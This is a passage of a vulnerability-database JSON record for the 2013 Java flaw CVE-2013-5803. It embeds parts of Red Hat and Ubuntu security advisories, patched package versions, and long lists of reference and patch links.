ta/cve/CVE-2013-5840.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5842.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5849.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5850.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-5851.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFSZWg6XlSAg2UNWIIRAtrcAJ9Pr8HUGP6KoZuAOmHGz4SotHk0CwCgmOVZ\n5FtHw7EpRVvpS7dBLzZEHE0=\n=QE5j\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2033-1\nNovember 21, 2013\n\nopenjdk-6 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. \n\nSoftware Description:\n- openjdk-6: Open Source Java implementation\n\nDetails:\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit these\nto expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783,\nCVE-2013-5804)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\navailability. An attacker could exploit these to cause a denial of service. \n(CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797,\nCVE-2013-5820)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure. An attacker could exploit these to expose sensitive\ndata over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790,\nCVE-2013-5840, CVE-2013-5849, CVE-2013-5851)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker could\nexploit these to cause a denial of service or expose sensitive data over\nthe network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829,\nCVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.12.04.4\n icedtea-6-jre-jamvm 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.12.04.4\n openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.12.04.4\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.10.04.4\n openjdk-6-jre-zero 6b27-1.12.6-1ubuntu0.10.04.4\n\nThis update uses a new upstream release, which includes additional bug\nfixes", "sources": [ { "db": "NVD", "id": "CVE-2013-5803" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "db": "BID", "id": "63082" }, { "db": "VULMON", "id": "CVE-2013-5803" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123647" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123942" }, { "db": "PACKETSTORM", "id": "124143" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-5803", "trust": 2.9 }, { "db": "HITACHI", "id": "HS13-025", "trust": 1.4 }, { "db": "BID", "id": "63082", "trust": 1.4 }, { "db": "JVNDB", "id": "JVNDB-2013-004699", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2013-5803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123649", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123647", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123689", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123942", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "124143", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5803" }, { "db": "BID", "id": "63082" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123647" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123942" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "NVD", "id": "CVE-2013-5803" } ] }, "id": "VAR-201310-0613", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-23T20:51:22.839000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2013-10-15-1", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2013/oct/msg00001.html" }, { "title": "HT5982", "trust": 0.8, "url": "http://support.apple.com/kb/ht5982" }, { "title": "HT5982", "trust": 0.8, "url": "http://support.apple.com/kb/ht5982?viewlocale=ja_jp" }, { "title": "HS13-025", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-025/index.html" }, { "title": "HPSBUX02944", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c04031212" }, { "title": "HPSBUX02943", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c04031205" }, { "title": "1655201", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21655201" }, { "title": "Oracle Critical Patch Update Advisory - October 2013", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2013 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013verbose-1899842.html" }, { "title": "Bug 1018713", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1018713" }, { "title": "RHSA-2013:1505", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1505.html" }, { "title": "RHSA-2013:1507", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1507.html" }, { "title": "RHSA-2013:1440", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1440.html" }, { "title": "RHSA-2013:1508", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1508.html" }, { "title": "RHSA-2013:1447", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1447.html" }, { "title": "RHSA-2013:1509", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1509.html" }, { "title": "RHSA-2013:1451", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1451.html" }, { "title": "RHSA-2013:1793", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1793.html" }, { "title": "October 2013 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2013_critical_patch_update" }, { "title": "HS13-025", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs13-025/index.html" }, { "title": "Red Hat: CVE-2013-5803", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2013-5803" }, { "title": "Red Hat: Important: java-1.5.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131509 - security advisory" }, { "title": "Red Hat: Important: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131505 - security advisory" }, { "title": "Red Hat: Important: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131447 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131451 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131508 - security advisory" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131793 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131507 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-oracle security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131440 - security advisory" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2033-1" }, { "title": "Amazon Linux AMI: ALAS-2013-246", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-246" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2089-1" }, { "title": "Amazon Linux AMI: ALAS-2013-235", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-235" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5803" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-5803" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "trust": 1.4, "url": "http://support.apple.com/kb/ht5982" }, { "trust": 1.4, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-025/index.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21655201" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-1440.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-1447.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-1508.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2033-1" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/63082" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1451.html" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2013/oct/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2013-11/msg00023.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1018713" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1507.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1505.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00013.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1793.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-1509.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=138674073720143\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=138674031212883\u0026w=2" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2089-1" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a18874" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5803" }, { "trust": 0.8, "url": "http://www.ipa.go.jp/security/ciadr/vul/20131016-jre.html" }, { "trust": 0.8, "url": "https://www.jpcert.or.jp/at/2013/at130043.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5803" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5774" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5814" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5782" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5804" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5797" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3829" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5772" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5780" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5778" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5802" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5783" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5809" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5817" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5784" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5803" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5820" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4002" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5790" }, { "trust": 0.4, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5817.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5797.html" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5782.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5802.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5803.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5778.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5823.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5783.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5780.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5850.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5842.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5849.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5840.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-3829.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5772.html" }, { "trust": 0.4, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5820.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5809.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5825.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5774.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5830.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5784.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5804.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5814.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5829.html" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21661375" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04031205" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04031212" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036549" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036518" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21660279" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_systems_director_storage_control_is_affected_by_vulnerabilities_in_ibm_java_sdk_cve_2014_0453_cve_2013_5772_cve_2013_5803_cv" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001745" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv53964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663427" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100176223" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667825" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659219" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv52145" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670264" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21664002" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659892" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660143" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21660145" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660149" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659757" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662428" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21656459" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660039" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_security_vulnerabilities_for_ibm_java_on_aix?lang=en_us" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664098" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671636" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21655990" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas38fe73318db4e6c8786257c32007ee70b" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3be721f674cf321ba86257c32007ee712" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662315" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0002.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5812" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5801" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5776" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5789" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5787" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5823" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5818" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5832.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5801.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5818.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5824.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5789.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5812.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5831.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5776.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5848.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5851.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5819.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-4002.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5790.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5787.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5843.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5825" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5819" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5800.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5800" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5852.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5838.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5830" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5840" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5842" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5849" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5850" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2013-5803" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2033-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=31270" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0864" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0865" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4471" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4002" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1478" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.1, "url": 